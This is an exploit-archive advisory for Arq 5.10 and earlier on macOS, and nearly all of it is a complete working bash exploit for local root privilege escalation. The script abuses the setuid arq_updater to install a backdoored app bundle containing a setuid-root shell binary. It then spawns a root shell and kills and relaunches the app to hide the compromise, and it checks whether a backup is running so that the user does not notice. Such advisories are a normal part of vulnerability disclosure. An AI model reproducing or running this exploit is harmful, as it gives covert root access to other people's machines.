Arq 5.10 Local root Privilege Escalation

2018.01.30
Credit: m4rkw
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

#!/bin/bash ################################################################# ###### Arq <= 5.10 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html ###### ################################################################# app="/Applications/Arq.app" res="$app/Contents/Resources" lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources" vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root` if [ "$vuln" == "" ] ; then echo "Not vulnerable - auto-updates not enabled." exit 1 fi if [ "$1" != "-f" ] ; then latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`" status_line="`egrep -i 'backup session.*?(ended|started)' \ \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`" if [ "$status_line" != "" ] ; then echo -n "WARNING: backup in progress, the user will very " echo "likely notice if we exploit now!" echo "use -f to override." exit 1 fi fi owd="`pwd`" if [ -e ~/.arq_510_privesc_exp ] ; then rm -rf ~/.arq_510_privesc_exp fi mkdir ~/.arq_510_privesc_exp cd ~/.arq_510_privesc_exp echo "copying application..." cp -R /Applications/Arq.app . echo "compiling payloads..." 
cat > payload.sh <<EOF #!/bin/bash rm -rf $HOME/.arq_510_privesc_exp while : do pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \ |cut -d ' ' -f2\` if [ "\$pid" != "" ] ; then kill -9 \$pid open $app/Contents/Library/LoginItems/Arq\ Agent.app exit 0 fi done EOF chmod 755 payload.sh au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'` cat > shell.c <<EOF #include <unistd.h> #include <string.h> int main(int ac, char *av[]) { if (ac > 1 && strcmp(av[1], "boom") == 0) { setuid(0); setgid(0); execl( "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr" "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay" "load.sh;/bin/bash", NULL ); } return 0; } EOF mv Arq.app/Contents/Resources/standardrestorer \ Arq.app/Contents/Resources/standardrestorer.orig gcc -o Arq.app/Contents/Resources/standardrestorer shell.c rm -f shell.c payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8` GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1` cwd=`pwd` echo "creating backdoored Arq.zip..." zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null rm -rf Arq.app/ echo "executing upgrade..." "$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \ 1>/dev/null 2>/dev/null echo "waiting..." while : do ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8` x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root` if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then cd "$owd" $res/standardrestorer boom exit 0 fi sleep 0.2 done

